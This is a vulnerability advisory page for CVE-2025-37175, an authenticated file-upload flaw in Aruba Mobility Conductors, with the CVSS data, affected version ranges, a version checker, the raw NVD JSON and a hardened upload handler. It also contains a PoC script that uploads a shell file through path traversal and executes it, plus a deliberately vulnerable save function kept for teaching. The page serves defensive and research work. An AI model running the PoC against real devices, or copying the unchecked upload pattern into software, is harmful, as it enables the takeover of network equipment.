Security Vulnerability Report
CVE-2025-37175 CVSS 7.2 HIGH

CVE-2025-37175

Published: 2026-01-13 20:16:06
Last Modified: 2026-01-23 16:37:56

Description

An arbitrary file upload vulnerability (CWE-434) exists in the web-based management interface of Mobility Conductors running either AOS-10 or AOS-8. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files as a privileged user and execute arbitrary commands on the underlying operating system. Note that the CVSS vector rates Privileges Required as High: the attacker must already hold high-privilege credentials for the management interface, so this is a post-authentication escalation from the web UI to the underlying OS rather than a pre-authentication remote compromise.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* from 6.5.4.0 up to (excluding) 8.10.0.21 - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* from 8.11.0.0 up to (excluding) 8.13.1.1 - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* from 10.3.0.0 up to (excluding) 10.4.1.10 - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* from 10.5.0.0 up to (excluding) 10.7.2.2 - VULNERABLE
ArubaOS-8: versions 6.5.4.0 up to but excluding 8.10.0.21, and 8.11.0.0 up to but excluding 8.13.1.1
ArubaOS-10: versions 10.3.0.0 up to but excluding 10.4.1.10, and 10.5.0.0 up to but excluding 10.7.2.2
Note that the affected set is four separate ranges, not simply "everything below 8.10" or "everything below 10.4": the 8.11 to 8.13.1.0 and 10.5 to 10.7.2.1 trains are affected as well. Per the NVD ranges, the upper bound of each range (8.10.0.21, 8.13.1.1, 10.4.1.10, 10.7.2.2) is the first build outside it; confirm the fixed builds against the vendor advisory under References.
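Deciding whether a given build is affected means comparing a four-component version against the half-open ranges in the NVD cpeMatch entries, and doing it numerically (a string comparison puts "8.10.0.21" before "8.10.0.3"). The checker below is an added example, not part of the page or any vendor tooling; the NVD_CONFIGURATIONS constant is a subset of the record's "configurations" block copied from the raw JSON further down, and the version strings are assumed to be purely numeric dotted versions.

```python
# Subset of the NVD "configurations" block for CVE-2025-37175 (copied from the record
# on this page; matchCriteriaId fields dropped as they are not needed for range checks).
NVD_CONFIGURATIONS = [
    {"nodes": [{"operator": "OR", "negate": False, "cpeMatch": [
        {"vulnerable": True, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
         "versionStartIncluding": "6.5.4.0", "versionEndExcluding": "8.10.0.21"},
        {"vulnerable": True, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
         "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1"},
        {"vulnerable": True, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
         "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10"},
        {"vulnerable": True, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*",
         "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2"},
    ]}]}
]


def parse_version(text, width=4):
    """'8.10.0.21' -> (8, 10, 0, 21). Shorter strings are zero-padded, so '8.10' == '8.10.0.0'.
    Tuples compare component-wise as integers, which is what makes 8.10.0.3 < 8.10.0.21 hold."""
    parts = text.strip().split(".")
    if not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    nums = tuple(int(p) for p in parts)
    if len(nums) > width:
        raise ValueError(f"more than {width} components: {text!r}")
    return nums + (0,) * (width - len(nums))


def affected_ranges(configurations):
    """Yield (start_including, end_excluding) tuples from every cpeMatch flagged vulnerable.
    A missing bound is returned as None (NVD omits it when a side is unbounded)."""
    ranges = []
    for config in configurations:
        for node in config.get("nodes", []):
            for match in node.get("cpeMatch", []):
                if not match.get("vulnerable"):
                    continue
                start = match.get("versionStartIncluding")
                end = match.get("versionEndExcluding")
                ranges.append((parse_version(start) if start else None,
                               parse_version(end) if end else None))
    return ranges


def matching_range(version, configurations=NVD_CONFIGURATIONS):
    """Return the (start, end) range containing 'version', or None if no vulnerable range matches."""
    v = parse_version(version)
    for start, end in affected_ranges(configurations):
        if (start is None or start <= v) and (end is None or v < end):
            return start, end
    return None


def is_affected(version, configurations=NVD_CONFIGURATIONS):
    """True if the build falls inside any vulnerable range (start inclusive, end exclusive)."""
    return matching_range(version, configurations) is not None


def fixed_version_for(version, configurations=NVD_CONFIGURATIONS):
    """For an affected build, the versionEndExcluding of its range (the first build outside it); else None."""
    found = matching_range(version, configurations)
    if found is None or found[1] is None:
        return None
    return ".".join(str(n) for n in found[1])


if __name__ == "__main__":
    for build in ["8.10.0.3", "8.10.0.20", "8.10.0.21", "8.12.0.0", "10.4.1.9", "10.4.2.0", "10.7.2.1"]:
        print(f"{build:>10}  affected={is_affected(build)!s:5}  fixed_in={fixed_version_for(build)}")
```

The lexicographic trap is easy to hit in inventory scripts: `"8.10.0.21" < "8.10.0.3"` is true for Python strings, so a naive comparison would mark 8.10.0.3 as already patched. Feeding the cpeMatch data straight from the NVD JSON also avoids transcribing the ranges by hand, which is how the "< 8.10.x.x" summary above lost the 8.11 and 10.5 trains.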

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. The request paths (/v1/api/login, /v1/configuration/upload, /v1/api/exec), the form parameters and the default credentials in the script are placeholders chosen by the PoC author; they are not documented anywhere else on this page (the NVD record below carries no endpoint detail), so confirm them against a target you are authorized to test before relying on the script. What the script does illustrate is the shape of the attack the description gives: an authenticated high-privilege session, an upload whose client-supplied filename carries a path traversal, and a follow-up request that executes the dropped file.
python
#!/usr/bin/env python3
# CVE-2025-37175 PoC - Aruba Mobility Conductor Arbitrary File Upload
# Note: This PoC is for educational and authorized testing purposes only.
# The request paths, parameters and credentials below are placeholders chosen by
# the PoC author; they are not taken from the vendor advisory.
import sys

import requests
import urllib3

# Disable TLS certificate warnings for testing in controlled environments
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TARGET_URL = "https://<target-ip>:4343"
USERNAME = "admin"
PASSWORD = "admin"


def login():
    """Authenticate to the Aruba Mobility Conductor and return the session cookies."""
    login_url = f"{TARGET_URL}/v1/api/login"
    data = {"username": USERNAME, "password": PASSWORD}
    try:
        response = requests.post(login_url, json=data, verify=False, timeout=30)
    except requests.RequestException as e:
        print(f"[-] Login failed: {e}")
        return None
    if response.status_code == 200:
        return response.cookies
    print(f"[-] Login returned HTTP {response.status_code}")
    return None


def upload_malicious_file(session_cookies):
    """Upload an arbitrary file; the traversal in 'filename' aims outside the upload directory."""
    upload_url = f"{TARGET_URL}/v1/configuration/upload"
    # Malicious file content (webshell placeholder)
    files = {
        "file": ("exploit.sh", "#!/bin/bash\n# Malicious payload here\n", "application/octet-stream")
    }
    data = {"filename": "../webapp/static/exploit.sh", "action": "upload"}
    try:
        response = requests.post(upload_url, files=files, data=data,
                                 cookies=session_cookies, verify=False, timeout=30)
    except requests.RequestException as e:
        print(f"[-] Upload failed: {e}")
        return False
    if response.status_code == 200:
        print("[+] File uploaded successfully")
        return True
    print(f"[-] Upload returned HTTP {response.status_code}")
    return False


def execute_command(session_cookies, cmd):
    """Trigger execution of the uploaded file.

    As written, the request only names the uploaded file; 'cmd' is not sent to the
    target. Whatever the uploaded script contains is what runs.
    """
    exec_url = f"{TARGET_URL}/v1/api/exec"
    params = {"file": "exploit.sh"}
    try:
        response = requests.get(exec_url, params=params,
                                cookies=session_cookies, verify=False, timeout=30)
    except requests.RequestException as e:
        print(f"[-] Execution failed: {e}")
        return None
    return response.text


def main():
    print("[*] CVE-2025-37175 PoC - Aruba Mobility Conductor RCE")
    print("[*] Target:", TARGET_URL)

    # Step 1: Login
    print("\n[1] Authenticating...")
    cookies = login()
    if not cookies:
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")

    # Step 2: Upload malicious file
    print("\n[2] Uploading malicious file...")
    if upload_malicious_file(cookies):
        print("[+] File upload successful")
    else:
        print("[-] File upload failed")
        sys.exit(1)

    # Step 3: Execute command
    print("\n[3] Executing command...")
    result = execute_command(cookies, "id")
    if result:
        print("[+] Command output:", result)


if __name__ == "__main__":
    main()
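The PoC's upload step relies on the server joining the client-supplied filename (here "../webapp/static/exploit.sh") to its upload directory without checking it, which is the defining defect behind CWE-434 findings of this kind. The pair of handlers below is an added illustration, not the vendor's code and not a claim about how this product's interface is implemented: the first reproduces the unchecked pattern, the second shows the checks a management interface should apply (keep only the final path component, allowlist the extension, verify the resolved path stays under the upload root, create the file non-executable and never overwrite). The allowlist, directory names and payload are constructed for the demonstration.

```python
import os
import pathlib
import tempfile

# Constructed allowlist for this illustration; a real interface would derive it from
# the specific upload feature (configuration files, certificates, ...).
ALLOWED_EXTENSIONS = {".cfg", ".pem", ".csv"}


class UploadRejected(Exception):
    pass


def vulnerable_save(upload_dir, client_filename, content):
    """Unchecked pattern: the client-supplied name is joined to the upload directory as-is,
    so '../webapp/static/exploit.sh' lands outside it and keeps its .sh name."""
    dest = os.path.join(upload_dir, client_filename)
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as f:
        f.write(content)
    return dest


def hardened_save(upload_dir, client_filename, content):
    """Hardened pattern: basename only, extension allowlist, containment check on the
    resolved path, non-executable mode, no overwrite of existing files."""
    if "\x00" in client_filename:
        raise UploadRejected("NUL byte in filename")
    # Treat backslashes as separators too, so Windows-style traversal is not passed through
    name = os.path.basename(client_filename.replace("\\", "/"))
    if name in ("", ".", ".."):
        raise UploadRejected("empty or traversal-only filename")
    if pathlib.PurePosixPath(name).suffix.lower() not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension of {name!r} not allowed")
    root = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(root, name))
    # realpath resolves symlinks, so a link planted inside upload_dir cannot redirect the write
    if os.path.commonpath([root, dest]) != root:
        raise UploadRejected("resolved path escapes the upload directory")
    try:
        fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    except FileExistsError:
        raise UploadRejected(f"{name!r} already exists")
    with os.fdopen(fd, "wb") as f:
        f.write(content)
    return dest


def demo():
    """Run both handlers in a scratch directory tree against the PoC's traversal name and a few
    variants; returns a dict of outcomes so the behaviour can be checked without reading output."""
    root = tempfile.mkdtemp(prefix="upload-demo-")
    upload_dir = os.path.join(root, "uploads")
    os.makedirs(upload_dir)
    traversal = "../webapp/static/exploit.sh"
    payload = b"#!/bin/bash\n# constructed placeholder payload\n"

    escaped = vulnerable_save(upload_dir, traversal, payload)
    real_upload = os.path.realpath(upload_dir)
    results = {
        "vulnerable_wrote_outside":
            os.path.commonpath([real_upload, os.path.realpath(escaped)]) != real_upload,
    }
    cases = [("traversal_sh", traversal), ("plain_sh", "exploit.sh"),
             ("traversal_cfg", "../../config.cfg"), ("dotdot", ".."),
             ("duplicate_cfg", "../../config.cfg")]
    for label, name in cases:
        try:
            dest = hardened_save(upload_dir, name, payload)
            results[label] = "saved:" + os.path.relpath(dest, real_upload)
        except UploadRejected as e:
            results[label] = "rejected:" + str(e)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:25} {value}")
```

Note what the hardened version does not do: it does not try to "clean" the traversal out of the name and keep the rest. Stripping "../" sequences in place is a well-known way to get bypassed ("....//" collapses to "../" after one pass); taking only the basename and then proving containment with realpath is simpler and does not depend on how clever the normaliser is.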

References

https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-37175",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-13T20:16:05.600",
    "lastModified": "2026-01-23T16:37:56.227",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Arbitrary file upload vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to upload arbitrary files as a privilege user and execute arbitrary commands on the underlying operating system."},
      {"lang": "es", "value": "Vulnerabilidad de carga de archivos arbitrarios existe en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan sistemas operativos AOS-10 o AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado cargar archivos arbitrarios como un usuario privilegiado y ejecutar comandos arbitrarios en el sistema operativo subyacente."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-434"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.4.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "187C0AB6-1290-4FE3-9FFE-7317DC57B931"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10", "matchCriteriaId": "93E77EBB-E46E-47E5-ADD2-1BD80257B08B"},
              {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2", "matchCriteriaId": "48B3A810-4DD3-403E-9A76-AB86EF7EA9D1"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}